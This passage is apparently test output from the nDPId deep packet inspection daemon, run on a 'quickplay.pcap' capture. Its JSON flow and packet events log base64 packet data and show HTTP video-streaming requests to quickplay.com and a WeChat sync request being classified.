Build\/KOT49H)"}} 
+00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1429000041819,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":339,"pkt_l4_len":303,"thread_ts_msec":1429000041819,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAUNnpEAArQZNhh8NRDEKNqn6AFCu+VJXvvpztuZQUBgIIrdJAABIVFRQLzEuMSAyMDQgTm8gQ29udGVudA0KQ2FjaGUtQ29udHJvbDogcHJpdmF0ZSwgbm8tc3RvcmUsIG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGUNCkVkZ2UtY29udHJvbDogY2FjaGUtbWF4YWdlPTI4ZA0KWC1GQi1EZWJ1ZzogajRyR1VwRDFrR0J2VWIvajBNRVhMMnlyRzg0NlVLcDBDV2hLNFFWcTB4K0hLUDR5UVIxR09sVWtXUFkvRGJKNnNKU1pTSWdIdGF1L04xQjF2cTNteXc9PQ0KRGF0ZTogVHVlLCAxNCBBcHIgMjAxNSAwODoyNzoyMSBHTVQNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0K"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7560000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"thread_ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+01108{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1429000048159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":543,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":543,"pkt_l4_len":507,"thread_ts_msec":1429000048159,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAg\/pGUAAPwYfWgo2qfp4HAUprOAAUG\/tOAJjh+GeUBg5CMy9AABHRVQgL3ZzdGIvcGxheWxpc3RfNV82MjQxXzM1Ny5tM3U4P2FjdGlvbj0xNDUmYXBwSWQ9NTAwNiZjYXJyaWVySWQ9MjMmYXBwVmVyc2lvbj0xLjAmY29udGVudElkPTYyNDEmY29udGVudFR5cGVJZD0zJmRldmljZU5hbWU9YW5kcm9pZG1vYmlsZSZlbmNvZGluZ0lkPTM1NyZkcm1JZD00JmRybVZlcnNpb249MS41JmRlbGl2ZXJ5PTUmcHJlZkxhbmd1YWdlPWVuZyZ3ZWJ2dHQ9dHJ1ZSZ1c2VyaWQ9MDkxNTQ5NzQ1MzYmdnN0YnR5cGU9c3RyZWFtaW5nIEhUVFAvMS4xDQpIb3N0OiBwbGF5LXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgQnVpbGQvS1RVODRQKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvMzMuMC4wLjAgTW9iaWxlIFNhZmFyaS81MzcuMzYNCg0K"} +01183{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000048159,"flow_last_seen":1429000048159,"flow_idle_time":7560000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":487,"flow_tot_l4_payload_len":487,"flow_avg_l4_payload_len":487,"midstream":1,"thread_ts_msec":1429000048159,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"play-singtelhawk.quickplay.com","url":"play-singtelhawk.quickplay.com\/vstb\/playlist_5_6241_357.m3u8?action=145&appId=5006&carrierId=23&appVersion=1.0&contentId=6241&contentTypeId=3&deviceName=androidmobile&encodingId=357&drmId=4&drmVersion=1.5&delivery=5&prefLanguage=eng&webvtt=true&userid=09154974536&vstbtype=streaming","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} +01108{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1429000048647,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":543,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":543,"pkt_l4_len":507,"thread_ts_msec":1429000048647,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAg\/pGkAAPwYfWQo2qfp4HAUprOAAUG\/tOAJjh+GeUBg5CMy9AABHRVQgL3ZzdGIvcGxheWxpc3RfNV82MjQxXzM1Ny5tM3U4P2FjdGlvbj0xNDUmYXBwSWQ9NTAwNiZjYXJyaWVySWQ9MjMmYXBwVmVyc2lvbj0xLjAmY29udGVudElkPTYyNDEmY29udGVudFR5cGVJZD0zJmRldmljZU5hbWU9YW5kcm9pZG1vYmlsZSZlbmNvZGluZ0lkPTM1NyZkcm1JZD00JmRybVZlcnNpb249MS41JmRlbGl2ZXJ5PTUmcHJlZkxhbmd1YWdlPWVuZyZ3ZWJ2dHQ9dHJ1ZSZ1c2VyaWQ9MDkxNTQ5NzQ1MzYmdnN0YnR5cGU9c3RyZWFtaW5nIEhUVFAvMS4xDQpIb3N0OiBwbGF5LXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20NCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCA0LjQuNDsgTUkgM1cgQnVpbGQvS1RVODRQKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBWZXJzaW9uLzQuMCBDaHJvbWUvMzMuMC4wLjAgTW9iaWxlIFNhZmFyaS81MzcuMzYNCg0K"} 
+02025{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1429000048795,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1225,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1225,"pkt_l4_len":1189,"thread_ts_msec":1429000048795,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBLkvDEAArAZpoXgcBSkKNqn6AFCs4GOH5p5v7TnpUBj\/\/xfxAABfMjA1NDAzM19GRUFUVVJFX0VOR0xJU0hfMl8wX0xUUlRfMjM5NzZmcHNfNzgzNDE5Mi5tMnRfU1RWMjBSMTkyLWluZGV4Lm0zdTg\/ZT0xNDI4OTk5Njk5Jmg9NDQ1MmM4NzAxMzM0YjUwMzg1ZGQxMjA0N2RjZjY2NmIKI0VYVC1YLVNUUkVBTS1JTkY6UFJPR1JBTS1JRD0xLEJBTkRXSURUSD0zNTgwOTMKaHR0cDovL3ZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWMjUwUjI0MC9xcG1lenotSGF3a19EaWdpdGFsX0NPTlRBR0lPTl8yMDU0MDMzX0ZFQVRVUkVfRU5HTElTSF8yXzBfTFRSVF8yMzk3NmZwc183ODM0MTkyLm0ydF9TVFYyNTBSMjQwLWluZGV4Lm0zdTg\/ZT0xNDI4OTk5Njk5Jmg9YTVjNmMyY2MzYjk1Y2FiMzhkN2Y2NzgxMWQzOWZkZmEKI0VYVC1YLVNUUkVBTS1JTkY6UFJPR1JBTS1JRD0xLEJBTkRXSURUSD00NTMyNjEKaHR0cDovL3ZvZC1zaW5ndGVsaGF3ay5xdWlja3BsYXkuY29tL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvVFZYVjMyMFIyNDAvcXBtZXp6LUhhd2tfRGlnaXRhbF9DT05UQUdJT05fMjA1NDAzM19GRUFUVVJFX0VOR0xJU0hfMl8wX0xUUlRfMjM5NzZmcHNfNzgzNDE5Mi5tMnRfVFZYVjMyMFIyNDAtaW5kZXgubTN1OD9lPTE0Mjg5OTk2OTkmaD1kNzg4ZWRhZWY4ZDI0ZWQ0M2YyZTFiM2YwMWE2ZmI0NgojRVhULVgtU1RSRUFNLUlORjpQUk9HUkFNLUlEPTEsQkFORFdJRFRIPTY4OTU1MwpodHRwOi8vdm9kLXNpbmd0ZWxoYXdrLnF1aWNrcGxheS5jb20vc2VnL3ZvbDEvcy9XYXJuZXIvcXBtZXp6aGF3a2RpZ2l0YWxjb250YWdpb24yMDU0MDMzZmVhdHVyZWVuZ2xpc2gyMGx0cnQyMzk3NmZwczc4MzQxOTIvMjAxNS0wMi0wMi9TVFY1MTBSMzYwL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjUxMFIzNjAtaW5kZXgubTN1OD9lPTE0Mjg5OTk2OTkmaD1hMWI3ZDFmNTY3NzYx
MDNkNTU4OTU2YWQwYWY2YTU2Mw=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7560000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"thread_ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01162{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1429000049060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":583,"pkt_l4_len":547,"thread_ts_msec":1429000049060,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAjfkbUAAPwYF3wo2qfp4HCMoyycAUPhJNRwVgNsjUBgBybAbAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi1pbmRleC5tM3U4P2U9MTQyODk5OTY5OSZoPTgzZGEwNzg3NTkwYTdhNDUwMTYzYmJkN2E2Zjk3NGNhIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgNC40LjQ7IE1JIDNXIEJ1aWxkL0tUVTg0UCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzMzLjAuMC4wIE1vYmlsZSBTYWZhcmkvNTM3LjM2DQoNCg=="} 
+01197{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000049060,"flow_last_seen":1429000049060,"flow_idle_time":7560000,"flow_min_l4_payload_len":527,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":527,"flow_avg_l4_payload_len":527,"midstream":1,"thread_ts_msec":1429000049060,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52007,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-index.m3u8?e=1428999699&h=83da0787590a7a450163bbd7a6f974ca","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 
+01050{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1429000049272,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000049272,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeTkfkAAPwYGIQo2qfp4HCMoyycAUPhJNysVgOaYUBgDEEglAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDAxLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7560000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"thread_ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+01184{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1429000050062,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":596,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":596,"pkt_l4_len":560,"thread_ts_msec":1429000050062,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAkSlZkAAPwZ8rwo2qfrLzZeg1mMAUMsBdKl7s0qnUBgAbhITAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1zbnNzeW5jIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMjc1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGtleHRzaG9ydC53ZWl4aW4ucXEuY29tDQpVc2VyLUFnZW50OiBNaWNyb01lc3NlbmdlciBDbGllbnQNCg0KjV8mAQBBVSvQfd8CEAIXSGRsPmwM34SDANYBswPsAcTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYedk0uwBKYCKwk1caV589saz0xALfFf\/iYFlFx1AxUdy484YNnqVDF8K+kVH3f2c9yoInZasFWfv137RkUwmCH+br0dsm2pY5PlW8IbHQGBJKkdj6f6t1lujHjoakqif1dkWjRkTjcDfsFtBglw4jP18zIVy+uqXK+1IUwvsPz80+hSVjN5hP25Llmt\/ESe34eB\/LJMU4AkN\/2f0FWCACM2tXWSzYfJGQOBiLS2DO0iM0="} +00829{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000050062,"flow_last_seen":1429000050062,"flow_idle_time":7560000,"flow_min_l4_payload_len":540,"flow_max_l4_payload_len":540,"flow_tot_l4_payload_len":540,"flow_avg_l4_payload_len":540,"midstream":1,"thread_ts_msec":1429000050062,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.151.160","src_port":54883,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": 
{"hostname":"hkextshort.weixin.qq.com","url":"http:\/\/hkextshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/mmsnssync","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} +01938{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1429000051331,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1152,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":1152,"pkt_l4_len":1116,"thread_ts_msec":1429000051331,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcBHAsp0AArAZOUHgcIygKNqn6AFDLJxWDzlj4STjnUBgIQ33VAAByqbIRKSnXO3n7wDbsfUk8e6VuWplgy2s+dhRInKblJDspkbYpMraIC2G\/R+GUD+2cHzU1WK917CgXy1UuWGNRG3nVdbmkpW6gXyTrK\/GWE44kpRkGnzPXCIHXPX744dGFJMegxO0qTCK1Fo6i3uEpacGLcKMMoyNpcaQHAYLI622xbJ8B36qbIZZWruxvDu7KIDG5e3mPu31z9S2QcHaVE4BE1tKVMaRT4CoWi1PkV85kYTw7+lXQj9CaQqhbKReGPL\/tcLMkyzZwE6IHJUK26PQvKyhEuU6GAQ+r9LcupqVlcd+NUyod+WhKMRAmSJil\/BRUsIdoudcrCIqRJzR5jVUoqyj\/ptMT5SVgA5N26bnxszCob1V6PGoSqrFbXGqUSFChkbSJKFRTCvxPDJYyRcjsMaoU12chr9o101HtsZqTm8Y5QbIAN7B8AVumqqy0fH9lTC67oIzCP4XCUFPOzmsTGixU55n8PiHFsO9k6FHgmL2Qpx9XZ7LZZq6kKLQZ6YEj4wSZ17X4PtdheB86DsQcq8hTQKwZ50xFXAuqOJAfjJ3Fwvpkhy0irBq+moIpZIUyDIXip19wI5TntRdQ6klOXxoMR4h+rkQF9NIWAZsF4N+T7NhEDH0IhJ+7C8yW\/XKrXV2QuHcZeah99tklt\/1RoCV3tlE3iI+9KsShs\/QYEoI2GuydlkjMnZTY8FZqf7NGoRzmtcyCTcSq7ihdZ8emY8+Em76YXV5DqpjEXAEAd6Ihi3wXtxe47OSDIzuYkFbw07vSe8r5pw+O8CvCFNmM+\/R5XtTzDC6jpCkjK2Ks4K8eO1sR7xVxwgkYKLOtWeJvnPFsHRpwPxtVG35fKrArPruPuT5oZOx\/pQJT9cFmcAl3RKKARXXxajyJ2qH50U92ABd9K3dq1HyFHG2aoh8ZR\/WT1vs31Bm0M7ATJhQL2l2m4hoGBonCWxZz758eNTp\/kC\/zRYgzH6m74xpGj038MxNX4to5jr+JtrVTP6loTNL8hf21+Z1vRJ8TKNwrI0CwNIptRF429nB7n+Pl6NrVJTHjMQt5IoQZRVlFDepGzD3fSDZZ4GjFo43mYzPMjWk0+FMIfnOvn6Gn8nXWwKtX1oF2fKKInSceON8GTZBwiFeJbBUg69aGCibPn5BkMxekscJXDNFdCB2xNetElbFYP+YoyUHk8ZsDR\/PLX1ywopxm9Q\/Py6arJrU3L+8wIopRGPUBVivuDfLh0pGSoWdpGKSTKIBICVrgSbSPdIgZjbfO0v4LLFX+kYV8QKziGFA\/WUp+nU5eMYE6UsEvLHeSktqvq0aUc+dVpxaKqVHlN+ect0oR9LY9MKk
AeQsdVq1CuWDxS+xrJyD\/Uu+pp1IZey306exBm3ut4YWy7OXTRL0TOwdk6mtjCmzQzJRmtiRCxM7bjXgmi1lSWiwmYs4+DuYZWGKvtZHnnKOVsVmU8qj1T9ly"} +01184{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1429000051366,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":596,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":596,"pkt_l4_len":560,"thread_ts_msec":1429000051366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAkSlZ0AAPwZ8rgo2qfrLzZeg1mMAUMsBdKl7s0qnUBgAbhITAABQT1NUIGh0dHA6Ly9oa2V4dHNob3J0LndlaXhpbi5xcS5jb20vY2dpLWJpbi9taWNyb21zZy1iaW4vbW1zbnNzeW5jIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGNsb3NlDQpDb250ZW50LUxlbmd0aDogMjc1DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KSG9zdDogaGtleHRzaG9ydC53ZWl4aW4ucXEuY29tDQpVc2VyLUFnZW50OiBNaWNyb01lc3NlbmdlciBDbGllbnQNCg0KjV8mAQBBVSvQfd8CEAIXSGRsPmwM34SDANYBswPsAcTdAQKE1XHhkgwTYJ\/4C3eKbQVsdC1Dk55XBGM8iLIuJNxQ2mKDGCiEu7hKfZxRSGMz97qFq2jItoGcPUyJfVpIIUYedk0uwBKYCKwk1caV589saz0xALfFf\/iYFlFx1AxUdy484YNnqVDF8K+kVH3f2c9yoInZasFWfv137RkUwmCH+br0dsm2pY5PlW8IbHQGBJKkdj6f6t1lujHjoakqif1dkWjRkTjcDfsFtBglw4jP18zIVy+uqXK+1IUwvsPz80+hSVjN5hP25Llmt\/ESe34eB\/LJMU4AkN\/2f0FWCACM2tXWSzYfJGQOBiLS2DO0iM0="} +00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1429000052145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":145,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":145,"pkt_l4_len":109,"thread_ts_msec":1429000052145,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcAIFK0UAArQZq68vNl6AKNqn6AFDWY3uzUB\/LAXbFUBgIIl2QAADLSVkFxdhO01jGkqqir\/4Pe\/qItPtTf6ajYud7yQvoMcf18CvkFV3iH59UBVcusMzzLrB7pfuUH4Sme9ekIxa0n3Xkcqj9Zb8GTsGgT4pSgGI1jIGtnmYZvw=="} 
+00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7560000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"thread_ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01051{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1429000052217,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":500,"pkt_l4_len":464,"thread_ts_msec":1429000052217,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAeRjSUAAPwaHVgo2qfp4HCMoyykAUHABsefLT2i4UBgBySAFAABHRVQgL3NlZy92b2wxL3MvV2FybmVyL3FwbWV6emhhd2tkaWdpdGFsY29udGFnaW9uMjA1NDAzM2ZlYXR1cmVlbmdsaXNoMjBsdHJ0MjM5NzZmcHM3ODM0MTkyLzIwMTUtMDItMDIvU1RWODBSMTkyL3FwbWV6ei1IYXdrX0RpZ2l0YWxfQ09OVEFHSU9OXzIwNTQwMzNfRkVBVFVSRV9FTkdMSVNIXzJfMF9MVFJUXzIzOTc2ZnBzXzc4MzQxOTIubTJ0X1NUVjgwUjE5Mi0wMDIwLnRzIEhUVFAvMS4xDQpIb3N0OiB2b2Qtc2luZ3RlbGhhd2sucXVpY2twbGF5LmNvbQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKExpbnV4OyBBbmRyb2lkIDQuNC40OyBNSSAzVyBCdWlsZC9LVFU4NFApIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS8zMy4wLjAuMCBNb2JpbGUgU2FmYXJpLzUzNy4zNg0KDQo="} 
+01147{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1429000052217,"flow_last_seen":1429000052217,"flow_idle_time":7560000,"flow_min_l4_payload_len":444,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":444,"flow_avg_l4_payload_len":444,"midstream":1,"thread_ts_msec":1429000052217,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"vod-singtelhawk.quickplay.com","url":"vod-singtelhawk.quickplay.com\/seg\/vol1\/s\/Warner\/qpmezzhawkdigitalcontagion2054033featureenglish20ltrt23976fps7834192\/2015-02-02\/STV80R192\/qpmezz-Hawk_Digital_CONTAGION_2054033_FEATURE_ENGLISH_2_0_LTRT_23976fps_7834192.m2t_STV80R192-0020.ts","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 4.4.4; MI 3W Build\/KTU84P) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/33.0.0.0 Mobile Safari\/537.36"}} 